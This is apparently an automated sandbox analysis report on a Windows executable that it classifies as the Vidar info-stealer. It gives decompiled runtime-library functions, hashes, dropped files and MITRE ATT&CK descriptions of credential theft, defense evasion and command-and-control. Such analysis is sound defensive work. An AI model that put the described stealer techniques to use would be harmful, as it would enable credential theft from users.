Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 004297FB
Part of subcall function 004297E6: __CxxThrowException@8.LIBCMT ref: 00429810
Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 00429821

_memmove.LIBCMT ref: 0040445F

Strings

invalid string position, xrefs: 00404421

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 73bba784c18f116d1d7509c1872dfbc783d5583e9846cc7f37cfe5c14f45eb15
Instruction ID: d3e800a50e5ecf516ca0372648a5400b0542f085a42d789ae1c1d99337823dfb
Opcode Fuzzy Hash: 73bba784c18f116d1d7509c1872dfbc783d5583e9846cc7f37cfe5c14f45eb15
Instruction Fuzzy Hash: FC01DB713002104BD724DDACED80B1AF7AAEBC5714724493FD291DB782D6B5EC428798

Uniqueness

Uniqueness Score: -1.00%

Function 00426A30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45
timeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00426A30(struct _FILETIME _a4, short* _a12, char _a16) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v14;
				signed int _v16;
				signed int _v18;
				signed int _v22;
				char _v24;
				void* __edi;
				void* __esi;
				signed int _t14;
				intOrPtr _t25;
				signed int _t45;

				_t14 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t14 ^ _t45;
				_t3 =  &_a16; // 0x427169
				_t4 =  &_v24; // 0x427169
				FileTimeToSystemTime( &_a4, _t4);
				_t29 = _v12;
				 *_a12 = (_v24 + 0xffffffc4 << 0x00000004 | _v22 & 0x0000000f) << 0x00000005 | _v18 & 0x0000001f;
				 *((short*)( *_t3)) = (_v14 & 0x0000003f | _v16 << 0x00000006) << 0x00000005 | _v12 + _t29 & 0x0000001f;
				return E0042A36A(_v12 + _t29 & 0x0000001f, _t25, _v8 ^ _t45, (_v14 & 0x0000003f | _v16 << 0x00000006) << 0x00000005 | _v12 + _t29 & 0x0000001f,  *_t3, _a12);
			}

0x00426a36
0x00426a3d
0x00426a45
0x00426a48
0x00426a50
0x00426a75
0x00426a78
0x00426a94
0x00426aa3

APIs

FileTimeToSystemTime.KERNEL32(?,iqB,0040A082,?,00427169,?,?,?,?,?,?,?,?,?,00428DCA,?), ref: 00426A50

Strings

iqB, xrefs: 00426A48, 00426A4B
iqB, xrefs: 00426A45

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Time$FileSystem
String ID: iqB$iqB
API String ID: 2086374402-2813305800
Opcode ID: 9af123b1a28da484530347f0280e56b17b42c201bba48328f34fb7cb2c9c0c3f
Instruction ID: 8ade357d0dd51616058dc5868229dc94846122b6c5df8d654f5502cd5604faa8
Opcode Fuzzy Hash: 9af123b1a28da484530347f0280e56b17b42c201bba48328f34fb7cb2c9c0c3f
Instruction Fuzzy Hash: CB018436E105099FDB04DF68D8409AEB7B5FF88300B548269E815E7354EA70AA16CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004210E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004210E0() {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				void* __ecx;
				void* __edi;
				signed int _t18;
				void* _t25;
				intOrPtr* _t26;
				void* _t33;
				intOrPtr* _t36;
				signed int _t38;

				_push(0xffffffff);
				_push(E0043F6DB);
				_push( *[fs:0x0]);
				_push(_t26);
				_push(_t33);
				_t18 =  *0x451f00; // 0xc21d6f0a
				_push(_t18 ^ _t38);
				 *[fs:0x0] =  &_v16;
				_t36 = _t26 + 0x50;
				_v20 = _t36;
				 *((intOrPtr*)( *((intOrPtr*)( *_t26 + 4)) + _t36 - 0x50)) = 0x446b24;
				_v8 = 0;
				 *((intOrPtr*)(_t36 - 0x4c)) = 0x446ae4;
				E004209E0(_t36 - 0x4c);
				E00418260(_t36 - 0x4c, _t33);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 - 0x50)) + 4)) + _t36 - 0x50)) = 0x446ad0;
				_v8 = 0xffffffff;
				 *_t36 = 0x445de4;
				_t25 = E00429F19(_t36);
				 *[fs:0x0] = _v16;
				return _t25;
			}

0x004210e3
0x004210e5
0x004210f0
0x004210f1
0x004210f3
0x004210f4
0x004210fb
0x004210ff
0x00421107
0x0042110d
0x00421110
0x0042111b
0x00421122
0x00421129
0x00421131
0x0042113c
0x00421145
0x0042114c
0x00421152
0x0042115d
0x0042116a

APIs

Part of subcall function 00418260: std::_Lockit::_Lockit.LIBCPMT ref: 00418286

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00421152

Part of subcall function 00429F19: std::ios_base::_Tidy.LIBCPMT ref: 00429F3A

Strings

PMA, xrefs: 0042114C
B, xrefs: 0042113C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::ios_base::_$Ios_base_dtorLockitLockit::_Tidystd::_
String ID: PMA$B
API String ID: 3925221016-1475184249
Opcode ID: 08059f89d48f144d5f8e3295a0b0e5c80cd8c3099635f720a4858d7499fe871c
Instruction ID: 76dad6ba51f724f8598c8034c670755a6f7dafa91181e5053c8b96226a730c6d
Opcode Fuzzy Hash: 08059f89d48f144d5f8e3295a0b0e5c80cd8c3099635f720a4858d7499fe871c
Instruction Fuzzy Hash: E601DEB1900618DFE710CF49D801A9AFBF8FB05318F10865FE8119B781D779A905CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00430152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00430152(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0042C93F(__edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E004324B4(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E004324B4(__ebx, __edx, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E0042C918(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0042FED9(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x00430152
0x00430155
0x0043015b
0x00430169
0x0043016f
0x00430177
0x00430183
0x0043018b
0x00430193
0x004301a7
0x004301a9
0x004301ad
0x004301b2
0x004301b8
0x004301ba
0x004301bc
0x004301bf
0x00000000
0x004301c6
0x004301ba
0x004301ad
0x004301a7
0x00430193
0x004301c7

APIs

Part of subcall function 0042C93F: __getptd.LIBCMT ref: 0042C945
Part of subcall function 0042C93F: __getptd.LIBCMT ref: 0042C955

__getptd.LIBCMT ref: 00430161

Part of subcall function 004324B4: __getptd_noexit.LIBCMT ref: 004324B7
Part of subcall function 004324B4: __amsg_exit.LIBCMT ref: 004324C4

__getptd.LIBCMT ref: 0043016F

Strings

csm, xrefs: 0043017D

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f829986e535caf957ee958afec2b6b8259e83d977907c3096af381183ae4e91e
Instruction ID: 1fd8c6eeda836febc4d412d773ba22c7d52755deee37e5d10487a01c96e487a6
Opcode Fuzzy Hash: f829986e535caf957ee958afec2b6b8259e83d977907c3096af381183ae4e91e
Instruction Fuzzy Hash: DE01A279801305CACF34DF61D4606AFB3B4AF18310F54262FE48096791CB7ED980CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00420E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00420E20(void* __ecx, signed char _a4) {
				intOrPtr* _t16;
				intOrPtr* _t27;

				_t27 = __ecx - 0x18;
				_t16 = _t27 + 0x18;
				 *((intOrPtr*)( *((intOrPtr*)( *_t27 + 4)) + _t16 - 0x18)) = 0x446ad8;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t16 - 8)) + 4)) + _t16 - 8)) = 0x446ad0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t16 - 0x18)) + 4)) + _t16 - 0x18)) = 0x446330;
				 *_t16 = 0x445de4;
				E00429F19(_t16);
				if((_a4 & 0x00000001) != 0) {
					_push(_t27);
					E0042A289();
				}
				return _t27;
			}

0x00420e24
0x00420e2c
0x00420e2f
0x00420e3d
0x00420e4b
0x00420e54
0x00420e5a
0x00420e66
0x00420e68
0x00420e69
0x00420e6e
0x00420e75

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00420E5A

Part of subcall function 00429F19: std::ios_base::_Tidy.LIBCPMT ref: 00429F3A

Strings

PMA, xrefs: 00420E54
B, xrefs: 00420E3D

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID: PMA$B
API String ID: 3167631304-1475184249
Opcode ID: 9fa54ea9e5baba5e4e02d8ecc54e3e1e1bd2f2f7fec97c4d25f97d9b2a244d0d
Instruction ID: 952e7d9ffa2e6c7dd9915b4572d15be8a42c33d6503ebb8a27fc93eeb3c867ad
Opcode Fuzzy Hash: 9fa54ea9e5baba5e4e02d8ecc54e3e1e1bd2f2f7fec97c4d25f97d9b2a244d0d
Instruction Fuzzy Hash: 15F0B4B46006149FD300CF04D58896AF7A5EF56308F24C09ADD055B362C3B6ED86CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00420DE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00420DE0(void* __ecx, signed char _a4) {
				intOrPtr* _t8;
				intOrPtr* _t15;

				_t15 = __ecx - 8;
				_t8 = _t15 + 8;
				 *((intOrPtr*)( *((intOrPtr*)( *_t15 + 4)) + _t8 - 8)) = 0x446ad0;
				 *_t8 = 0x445de4;
				E00429F19(_t8);
				if((_a4 & 0x00000001) != 0) {
					_push(_t15);
					E0042A289();
				}
				return _t15;
			}

0x00420de4
0x00420dec
0x00420def
0x00420df8
0x00420dfe
0x00420e0a
0x00420e0c
0x00420e0d
0x00420e12
0x00420e19

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00420DFE

Part of subcall function 00429F19: std::ios_base::_Tidy.LIBCPMT ref: 00429F3A

Strings

PMA, xrefs: 00420DF8
B, xrefs: 00420DEF

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID: PMA$B
API String ID: 3167631304-1475184249
Opcode ID: f8ccaa73c7a18bec04528dec05eddf0bf0e9ee6bc8819d3fa90be37c87fae706
Instruction ID: eff44412f394a3bd83aa550a06f90a077a8487f5fc9b793779581ddb76c83f35
Opcode Fuzzy Hash: f8ccaa73c7a18bec04528dec05eddf0bf0e9ee6bc8819d3fa90be37c87fae706
Instruction Fuzzy Hash: BCE0DFB26006289BD200DA45E808A86F7989F0230CF14C06AED4997302D3BAE995C7EA

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 06625899.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\22919964096183665961703616

C:\ProgramData\36067264576515806059430256

C:\ProgramData\50764714324176067669882221

C:\ProgramData\57469657185917597184786931

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
06625899.exe

Function 00424430 Relevance: 227.4, APIs: 151, Instructions: 911
libraryloaderCOMMON

Function 0040BC20 Relevance: 86.2, APIs: 46, Strings: 3, Instructions: 475
stringfileCOMMON

Function 00416B10 Relevance: 77.4, APIs: 36, Strings: 8, Instructions: 442
filestringCOMMON

Function 0040D1C0 Relevance: 66.9, APIs: 21, Strings: 17, Instructions: 363
stringCOMMON

Function 00410940 Relevance: 57.3, APIs: 1, Strings: 31, Instructions: 1273
COMMON

Function 00416500 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 166
stringfileCOMMON

Function 00411DD0 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 172
stringfileCOMMON

Function 00411B90 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 149
stringfileCOMMON

Function 0041AFF0 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 310
fileCOMMON

Function 0041F170 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 177
memorycomtimeCOMMON

Function 00428C70 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 670
COMMONCrypto

Function 0041EE70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 82
memoryCOMMON

Function 00414330 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122
networkmemoryfileCOMMON

Function 0041F040 Relevance: 15.1, APIs: 10, Instructions: 91
stringprocessCOMMON

Function 0041EED8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
COMMON

Function 00424100 Relevance: 7.6, APIs: 5, Instructions: 134
fileCOMMON

Function 00409EC0 Relevance: 7.6, APIs: 5, Instructions: 64
encryptionCOMMON

Function 00420120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
timeCOMMON

Function 00401090 Relevance: 5.0, APIs: 4, Instructions: 38
sleepCOMMON

Function 00415040 Relevance: 4.5, APIs: 3, Instructions: 49
memoryencryptionCOMMON

Function 0041EDD0 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Function 004011A0 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 00412D80 Relevance: 160.5, APIs: 79, Strings: 12, Instructions: 1294
stringCOMMON

Function 0041DCD0 Relevance: 123.2, APIs: 55, Strings: 15, Instructions: 724
stringCOMMON

Function 0040F790 Relevance: 107.8, APIs: 59, Strings: 2, Instructions: 1094
stringsleepmemoryCOMMON

Function 0041BAF0 Relevance: 73.9, APIs: 39, Strings: 3, Instructions: 437
stringregistryCOMMON

Function 0041CA40 Relevance: 62.0, APIs: 34, Strings: 1, Instructions: 727
stringCOMMON

Function 0040D960 Relevance: 60.4, APIs: 28, Strings: 6, Instructions: 863
networkfileCOMMON

Function 004014E0 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 161
memoryCOMMON

Function 0040C480 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 240
stringnetworkCOMMON

Function 0040D6E0 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 171
stringCOMMON

Function 0041E9F0 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 129
registrystringCOMMON

Function 0040EF60 Relevance: 32.0, APIs: 16, Strings: 2, Instructions: 514
sleepstringCOMMON

Function 00417B80 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 115
stringCOMMON

Function 00415200 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 149
stringmemoryfileCOMMON

Function 0041C3E0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 220
stringCOMMON

Function 0041F8E0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 350
memoryCOMMON

Function 00412570 Relevance: 23.0, APIs: 15, Instructions: 531
stringCOMMON

Function 00420760 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 149
COMMON

Function 0041F6C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163
comCOMMON

Function 00409D50 Relevance: 18.1, APIs: 12, Instructions: 119
COMMON

Function 00409070 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 344
fileCOMMON

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre